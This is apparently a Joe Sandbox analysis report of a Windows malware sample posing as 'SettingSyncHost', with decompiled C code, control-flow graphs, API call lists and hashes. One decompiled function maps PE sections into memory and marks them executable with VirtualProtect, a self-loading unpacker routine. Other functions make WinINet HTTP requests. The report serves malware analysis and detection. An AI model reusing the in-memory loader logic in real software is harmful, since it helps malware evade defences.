                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 459529453-0
                                                                                                                                      • Opcode ID: 2bb9c09aa9fad5e654f9926b126f8b5d96d91f196671d341b4f752b839b10b64
                                                                                                                                      • Instruction ID: b3926ca85b4dd29934c58d52650b0c5c7193c5f8228c91ff76e7722ae623f20e
                                                                                                                                      • Opcode Fuzzy Hash: 2bb9c09aa9fad5e654f9926b126f8b5d96d91f196671d341b4f752b839b10b64
                                                                                                                                      • Instruction Fuzzy Hash: 12418E72A00219CFCB16DF54EA81B6EB7B4FB44B10F15416FE846AB381DB74AE05CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003922C0, Relevance: 6.2, APIs: 4, Instructions: 195memoryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      C-Code - Quality: 26%
                                                                                                                                      			E003922C0(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v12;
				signed short _v24;
				signed int _v36;
				long _v48;
				intOrPtr _v60;
				void _v256;
				int _t75;
				void* _t80;
				void* _t82;
				void* _t115;
				long _t118;
				void* _t130;
				void* _t131;
				long long* _t133;
				long long* _t136;
				long long* _t138;
				long long* _t140;
				long long* _t142;
				void* _t143;
				long long* _t144;
				void* _t145;
				long long* _t146;
				long long* _t149;
				long long* _t152;
				long long _t155;
				long long _t156;
				long long _t157;
				long long _t158;
				long long _t159;
				long long _t160;
				long long _t161;
				long long _t162;
				long long _t163;

				_t115 = __edx;
				memset( &_v256, 0xcccccccc, 0x3f << 2);
				_t5 = _a4 + 0x3c; // 0xffe200e8
				_v60 = _a4 +  *_t5;
				_t133 = _t131 + 0xc - 8;
				_t155 =  *0x3bbc50;
				 *_t133 = _t155;
				E00393700(_t115);
				 *_t133 = _t155;
				E003935B0(_t115);
				 *_t133 = _t155;
				E00393460(_t115);
				 *_t133 = _t155;
				E00393340();
				st0 = _t155;
				_t116 = _a4;
				E003938C0(0x3c8900, _a4,  *((intOrPtr*)(_v60 + 0x54)));
				_t136 = _t133 + 0x14 - 8;
				_t156 =  *0x3bbc50;
				 *_t136 = _t156;
				E00393700(_a4);
				 *_t136 = _t156;
				E003935B0(_a4);
				 *_t136 = _t156;
				E00393460(_t116);
				 *_t136 = _t156;
				E00393340();
				st0 = _t156;
				_t117 = _v60;
				_v12 = _v60 + ( *(_v60 + 0x14) & 0x0000ffff) + 0x18;
				_t138 = _t136 + 8 - 8;
				_t157 =  *0x3bbc50;
				 *_t138 = _t157;
				E00393700(_v60);
				 *_t138 = _t157;
				E003935B0(_t117);
				 *_t138 = _t157;
				E00393460(_t117);
				 *_t138 = _t157;
				E00393340();
				st0 = _t157;
				_v24 =  *((intOrPtr*)(_v60 + 6));
				_t140 = _t138 + 8 - 8;
				_t158 =  *0x3bbc50;
				 *_t140 = _t158;
				E00393700(_t117);
				 *_t140 = _t158;
				E003935B0(_t117);
				 *_t140 = _t158;
				E00393460(_t117);
				 *_t140 = _t158;
				E00393340();
				st0 = _t158;
				_t142 = _t140 + 8 - 8;
				_t159 =  *0x3bbc50;
				 *_t142 = _t159;
				E00393700(_t117);
				 *_t142 = _t159;
				E003935B0(_t117);
				 *_t142 = _t159;
				E00393460(_t117);
				 *_t142 = _t159;
				E00393340();
				st0 = _t159;
				_t143 = _t142 + 8;
				_v36 = 0;
				while((_v36 & 0x0000ffff) < (_v24 & 0x0000ffff)) {
					_t149 = _t143 - 8;
					_t162 =  *0x3bbc50;
					 *_t149 = _t162;
					E00393700(_t117);
					 *_t149 = _t162;
					E003935B0(_t117);
					 *_t149 = _t162;
					E00393460(_t117);
					 *_t149 = _t162;
					E00393340();
					st0 = _t162;
					_t117 =  *((intOrPtr*)(_v12 + 0xc + (_v36 & 0x0000ffff) * 0x28)) + 0x3c8900;
					E003938C0( *((intOrPtr*)(_v12 + 0xc + (_v36 & 0x0000ffff) * 0x28)) + 0x3c8900, _a4 +  *((intOrPtr*)(_v12 + 0x14 + (_v36 & 0x0000ffff) * 0x28)),  *((intOrPtr*)(_v12 + 0x10 + (_v36 & 0x0000ffff) * 0x28)));
					_t152 = _t149 + 0x14 - 8;
					_t163 =  *0x3bbc50;
					 *_t152 = _t163;
					E00393700( *((intOrPtr*)(_v12 + 0xc + (_v36 & 0x0000ffff) * 0x28)) + 0x3c8900);
					 *_t152 = _t163;
					E003935B0( *((intOrPtr*)(_v12 + 0xc + (_v36 & 0x0000ffff) * 0x28)) + 0x3c8900);
					 *_t152 = _t163;
					E00393460(_t117);
					 *_t152 = _t163;
					E00393340();
					st0 = _t163;
					_t143 = _t152 + 8;
					_v36 = _v36 + 1;
				}
				_t144 = _t143 - 8;
				_t160 =  *0x3bbc50;
				 *_t144 = _t160;
				E00393700(_t117);
				 *_t144 = _t160;
				E003935B0(_t117);
				 *_t144 = _t160;
				E00393460(_t117);
				 *_t144 = _t160;
				E00393340();
				st0 = _t160;
				_t145 = _t144 + 8;
				_t118 =  *(_v60 + 0x50);
				_t75 = VirtualProtect(0x3c8900, _t118, 0x40,  &_v48); // executed
				__eflags = _t145 - _t145;
				E003931A1(_t75, _t145 - _t145);
				_t146 = _t145 - 8;
				_t161 =  *0x3bbc50;
				 *_t146 = _t161;
				E00393700(_t118);
				 *_t146 = _t161;
				E003935B0(_t118);
				 *_t146 = _t161;
				E00393460(_t118);
				 *_t146 = _t161;
				_t80 = E00393340();
				st0 = _t161;
				_push(_t118);
				E003931C4(0x39256c);
				_t82 = _t80;
				__eflags = _t130 - _t146 + 0x104;
				return E003931A1(_t82, _t130 - _t146 + 0x104);
			}




































                                                                                                                                      0x003922c0
                                                                                                                                      0x003922dc
                                                                                                                                      0x003922e4
                                                                                                                                      0x003922e7
                                                                                                                                      0x003922ea
                                                                                                                                      0x003922ed
                                                                                                                                      0x003922f3
                                                                                                                                      0x003922f6
                                                                                                                                      0x003922fb
                                                                                                                                      0x003922fe
                                                                                                                                      0x00392303
                                                                                                                                      0x00392306
                                                                                                                                      0x0039230b
                                                                                                                                      0x0039230e
                                                                                                                                      0x00392313
                                                                                                                                      0x0039231f
                                                                                                                                      0x00392328
                                                                                                                                      0x00392330
                                                                                                                                      0x00392333
                                                                                                                                      0x00392339
                                                                                                                                      0x0039233c
                                                                                                                                      0x00392341
                                                                                                                                      0x00392344
                                                                                                                                      0x00392349
                                                                                                                                      0x0039234c
                                                                                                                                      0x00392351
                                                                                                                                      0x00392354
                                                                                                                                      0x00392359
                                                                                                                                      0x00392365
                                                                                                                                      0x0039236c
                                                                                                                                      0x0039236f
                                                                                                                                      0x00392372
                                                                                                                                      0x00392378
                                                                                                                                      0x0039237b
                                                                                                                                      0x00392380
                                                                                                                                      0x00392383
                                                                                                                                      0x00392388
                                                                                                                                      0x0039238b
                                                                                                                                      0x00392390
                                                                                                                                      0x00392393
                                                                                                                                      0x00392398
                                                                                                                                      0x003923a4
                                                                                                                                      0x003923a8
                                                                                                                                      0x003923ab
                                                                                                                                      0x003923b1
                                                                                                                                      0x003923b4
                                                                                                                                      0x003923b9
                                                                                                                                      0x003923bc
                                                                                                                                      0x003923c1
                                                                                                                                      0x003923c4
                                                                                                                                      0x003923c9
                                                                                                                                      0x003923cc
                                                                                                                                      0x003923d1
                                                                                                                                      0x003923d6
                                                                                                                                      0x003923d9
                                                                                                                                      0x003923df
                                                                                                                                      0x003923e2
                                                                                                                                      0x003923e7
                                                                                                                                      0x003923ea
                                                                                                                                      0x003923ef
                                                                                                                                      0x003923f2
                                                                                                                                      0x003923f7
                                                                                                                                      0x003923fa
                                                                                                                                      0x003923ff
                                                                                                                                      0x00392401
                                                                                                                                      0x00392406
                                                                                                                                      0x00392418
                                                                                                                                      0x00392428
                                                                                                                                      0x0039242b
                                                                                                                                      0x00392431
                                                                                                                                      0x00392434
                                                                                                                                      0x00392439
                                                                                                                                      0x0039243c
                                                                                                                                      0x00392441
                                                                                                                                      0x00392444
                                                                                                                                      0x00392449
                                                                                                                                      0x0039244c
                                                                                                                                      0x00392451
                                                                                                                                      0x00392485
                                                                                                                                      0x0039248c
                                                                                                                                      0x00392494
                                                                                                                                      0x00392497
                                                                                                                                      0x0039249d
                                                                                                                                      0x003924a0
                                                                                                                                      0x003924a5
                                                                                                                                      0x003924a8
                                                                                                                                      0x003924ad
                                                                                                                                      0x003924b0
                                                                                                                                      0x003924b5
                                                                                                                                      0x003924b8
                                                                                                                                      0x003924bd
                                                                                                                                      0x003924bf
                                                                                                                                      0x00392414
                                                                                                                                      0x00392414
                                                                                                                                      0x003924c7
                                                                                                                                      0x003924ca
                                                                                                                                      0x003924d0
                                                                                                                                      0x003924d3
                                                                                                                                      0x003924d8
                                                                                                                                      0x003924db
                                                                                                                                      0x003924e0
                                                                                                                                      0x003924e3
                                                                                                                                      0x003924e8
                                                                                                                                      0x003924eb
                                                                                                                                      0x003924f0
                                                                                                                                      0x003924f2
                                                                                                                                      0x00392500
                                                                                                                                      0x00392509
                                                                                                                                      0x0039250f
                                                                                                                                      0x00392511
                                                                                                                                      0x00392516
                                                                                                                                      0x00392519
                                                                                                                                      0x0039251f
                                                                                                                                      0x00392522
                                                                                                                                      0x00392527
                                                                                                                                      0x0039252a
                                                                                                                                      0x0039252f
                                                                                                                                      0x00392532
                                                                                                                                      0x00392537
                                                                                                                                      0x0039253a
                                                                                                                                      0x0039253f
                                                                                                                                      0x00392544
                                                                                                                                      0x0039254e
                                                                                                                                      0x00392553
                                                                                                                                      0x0039255e
                                                                                                                                      0x00392568

                                                                                                                                      APIs
                                                                                                                                      • _memmove.LIBCMT ref: 00392328
                                                                                                                                      • _memmove.LIBCMT ref: 0039248C
                                                                                                                                      • VirtualProtect.KERNELBASE(003C8900,?,00000040,?), ref: 00392509
                                                                                                                                      • @_RTC_CheckStackVars@8.LIBCMT ref: 0039254E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memmove$CheckProtectStackVars@8Virtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1924416307-0
                                                                                                                                      • Opcode ID: 75493b0b539680b8790e5ef646e7770ef102b8304c9e0ffad48aabfe96512fbc
                                                                                                                                      • Instruction ID: f12480fbb02fb880399d2554c2c4fe9ef0c6500c0219050c3da5bd36f672b1b5
                                                                                                                                      • Opcode Fuzzy Hash: 75493b0b539680b8790e5ef646e7770ef102b8304c9e0ffad48aabfe96512fbc
                                                                                                                                      • Instruction Fuzzy Hash: 326102B4904409D6CF0ABF69E88A4BDFFB4EF44719F0149A9F4C05A191EF318A68C75A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003D12A0, Relevance: 6.1, APIs: 4, Instructions: 85networkCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 978 3d12a0-3d12d9 979 3d1338 978->979 980 3d12db-3d12df 978->980 981 3d133a-3d133f 979->981 982 3d12e1 980->982 983 3d12e3-3d12e7 980->983 984 3d1347-3d135a 981->984 985 3d1341-3d1343 981->985 982->983 986 3d12e9 983->986 987 3d12eb-3d1310 HttpOpenRequestA 983->987 985->984 986->987 987->979 988 3d1312-3d1318 987->988 989 3d131c-3d132f HttpSendRequestW 988->989 990 3d131a 988->990 991 3d135d-3d1362 989->991 992 3d1331-3d1332 InternetCloseHandle 989->992 990->989 993 3d136a-3d1373 InternetCloseHandle 991->993 994 3d1364-3d1366 991->994 992->979 993->981 994->993
                                                                                                                                      APIs
                                                                                                                                      • HttpOpenRequestA.WININET(00000000,?,?,00000000,00000000,00000000,00000000,00000001), ref: 003D1306
                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 003D1327
                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003D1332
                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003D136B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseHandleHttpInternetRequest$OpenSend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2920616234-0
                                                                                                                                      • Opcode ID: d15f422d57142ba9d076200d5c0d32e9ef271e4190639fcf53f94bd335f83ecf
                                                                                                                                      • Instruction ID: 983efb7d5076f6deaf48c64dcf7088cbc23059c840d546087e527ee789db7ca2
                                                                                                                                      • Opcode Fuzzy Hash: d15f422d57142ba9d076200d5c0d32e9ef271e4190639fcf53f94bd335f83ecf
                                                                                                                                      • Instruction Fuzzy Hash: 6E21AD36701604BFEB26CF50DC44FAAB7A8FF06710F14456AE9169B780CB71AC41CBA4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003CB580, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1070 3cb580-3cb5f6 call 3d9dea 1073 3cb5f8-3cb5fa call 3da0cd 1070->1073 1074 3cb616-3cb620 call 3d9d9d 1070->1074 1077 3cb5ff-3cb613 1073->1077
                                                                                                                                      APIs
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003CB5AB
                                                                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003CB5FA
                                                                                                                                        • Part of subcall function 003DA0CD: _Yarn.LIBCPMT ref: 003DA0EC
                                                                                                                                        • Part of subcall function 003DA0CD: _Yarn.LIBCPMT ref: 003DA110
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                      • String ID: bad locale name
                                                                                                                                      • API String ID: 1908188788-1405518554
                                                                                                                                      • Opcode ID: 328b67c3579684347be32e1284b6ef116d52a3714bca0fd053e7231128c7642f
                                                                                                                                      • Instruction ID: efff91e81246a789401ff302d772679438cae52d6c470a0136322de95f7f84ea
                                                                                                                                      • Opcode Fuzzy Hash: 328b67c3579684347be32e1284b6ef116d52a3714bca0fd053e7231128c7642f
                                                                                                                                      • Instruction Fuzzy Hash: 6611E0B1504B849FD321CF68C901B47BBE8EF19710F008A2FE889C7B81D775A504CBA5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E36E5, Relevance: 4.6, APIs: 3, Instructions: 141COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1079 3e36e5-3e36fb call 3e3844 1081 3e3700-3e3706 1079->1081 1082 3e374b 1081->1082 1083 3e3708-3e3737 call 3e5a10 call 3ef2c9 1081->1083 1084 3e374d-3e3751 1082->1084 1089 3e3739-3e373c 1083->1089 1090 3e3752-3e3763 call 3e5cf9 1083->1090 1091 3e3839-3e3843 call 3de25c 1089->1091 1092 3e3742-3e3745 1089->1092 1090->1082 1096 3e3765-3e377f call 3ef2c9 1090->1096 1092->1082 1092->1091 1100 3e379c-3e37ae 1096->1100 1101 3e3781-3e3784 1096->1101 1104 3e37d6-3e37e4 1100->1104 1105 3e37b0-3e37b6 1100->1105 1102 3e378a-3e378d 1101->1102 1103 3e3837 1101->1103 1102->1103 1109 3e3793-3e379a call 3e5cbf 1102->1109 1103->1091 1107 3e3816-3e3832 1104->1107 1108 3e37e6-3e37f2 1104->1108 1105->1104 1106 3e37b8-3e37d3 call 3e5cbf 1105->1106 1106->1104 1107->1084 1108->1107 1111 3e37f4-3e37f9 1108->1111 1109->1082 1111->1107 1114 3e37fb-3e3811 call 3e5cbf 1111->1114 1114->1107
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5A10: GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                        • Part of subcall function 003E5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                      • _free.LIBCMT ref: 003E3794
                                                                                                                                      • _free.LIBCMT ref: 003E37C2
                                                                                                                                      • _free.LIBCMT ref: 003E3805
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3291180501-0
                                                                                                                                      • Opcode ID: b6aeccb0bd28f0561a5b15ba918d93645f6946f275a6a90b7918c87c218e6689
                                                                                                                                      • Instruction ID: ffbd0e47d63df625e55235df1a38a65a47781b36bdfac0a95f85cf38de45d1bf
                                                                                                                                      • Opcode Fuzzy Hash: b6aeccb0bd28f0561a5b15ba918d93645f6946f275a6a90b7918c87c218e6689
                                                                                                                                      • Instruction Fuzzy Hash: E6419971600252AFDB26DFADC889A69B3E8FF49314B250A6DF445CB391EB31ED10DB50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003D1210, Relevance: 4.6, APIs: 3, Instructions: 124networkCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1118 3d1210-3d1219 1119 3d121b-3d1225 1118->1119 1120 3d1243-3d125b 1118->1120 1121 3d1239-3d1240 call 3d8f05 1119->1121 1122 3d1227-3d1235 1119->1122 1123 3d125d-3d1267 1120->1123 1124 3d1285-3d1298 1120->1124 1121->1120 1125 3d1299-3d12d9 call 3de23f 1122->1125 1126 3d1237 1122->1126 1128 3d1269-3d1277 1123->1128 1129 3d127b-3d1282 call 3d8f05 1123->1129 1137 3d1338 1125->1137 1138 3d12db-3d12df 1125->1138 1126->1121 1128->1125 1130 3d1279 1128->1130 1129->1124 1130->1129 1139 3d133a-3d133f 1137->1139 1140 3d12e1 1138->1140 1141 3d12e3-3d12e7 1138->1141 1142 3d1347-3d135a 1139->1142 1143 3d1341-3d1343 1139->1143 1140->1141 1144 3d12e9 1141->1144 1145 3d12eb-3d1310 HttpOpenRequestA 1141->1145 1143->1142 1144->1145 1145->1137 1146 3d1312-3d1318 1145->1146 1147 3d131c-3d132f HttpSendRequestW 1146->1147 1148 3d131a 1146->1148 1149 3d135d-3d1362 1147->1149 1150 3d1331-3d1332 InternetCloseHandle 1147->1150 1148->1147 1151 3d136a-3d1373 InternetCloseHandle 1149->1151 1152 3d1364-3d1366 1149->1152 1150->1137 1151->1139 1152->1151
                                                                                                                                      APIs
                                                                                                                                      • HttpOpenRequestA.WININET(00000000,?,?,00000000,00000000,00000000,00000000,00000001), ref: 003D1306
                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 003D1327
                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 003D1332
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HttpRequest$CloseHandleInternetOpenSend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 324341184-0
                                                                                                                                      • Opcode ID: 02ec7cdbdc9cb2f22fd8513ab26f1de84ab6ea97a8a47d42f0a8e54c1484fefd
                                                                                                                                      • Instruction ID: f4613a5ca99e7e992d1887f089b5219fec11483db8f0770abb1d7fce8593cba4
                                                                                                                                      • Opcode Fuzzy Hash: 02ec7cdbdc9cb2f22fd8513ab26f1de84ab6ea97a8a47d42f0a8e54c1484fefd
                                                                                                                                      • Instruction Fuzzy Hash: 4241D272601600AFE72ACF64EC48B6AB7A9EF05710F144A5EE4568BB81C771EC81CB94
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E3844, Relevance: 4.6, APIs: 3, Instructions: 96COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1175 3e3844-3e384e 1176 3e385e-3e387a call 3ef00a 1175->1176 1177 3e3850-3e3855 call 3e2855 1175->1177 1182 3e387c-3e387f 1176->1182 1183 3e3886-3e3896 call 3e5c62 1176->1183 1180 3e385a-3e385d 1177->1180 1184 3e38d4-3e3910 call 3de25c call 3e91f1 call 3e368a 1182->1184 1185 3e3881-3e3884 1182->1185 1190 3e3898-3e38ac call 3ef00a 1183->1190 1191 3e38c7-3e38d3 call 3e5cbf 1183->1191 1204 3e3915-3e3916 1184->1204 1185->1183 1185->1184 1198 3e38ae-3e38b1 1190->1198 1199 3e38ba-3e38c5 call 3e2855 1190->1199 1198->1184 1202 3e38b3-3e38b6 1198->1202 1199->1191 1202->1184 1205 3e38b8 1202->1205 1205->1191
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __cftoe$_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1303422935-0
                                                                                                                                      • Opcode ID: 0f79af1f72b8c7595cfde80451d87f7412d5271e17d41ace244274fa41680445
                                                                                                                                      • Instruction ID: c89e32dc4f05c531c05bcc2e6c9fcfbed512ef7d95bf82a7969eb4dcbb86a166
                                                                                                                                      • Opcode Fuzzy Hash: 0f79af1f72b8c7595cfde80451d87f7412d5271e17d41ace244274fa41680445
                                                                                                                                      • Instruction Fuzzy Hash: 4D21F772900168BACF16AA968C4AEDF7BADDF84320F214326F914EB1C1EE30CB058751
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E149E, Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
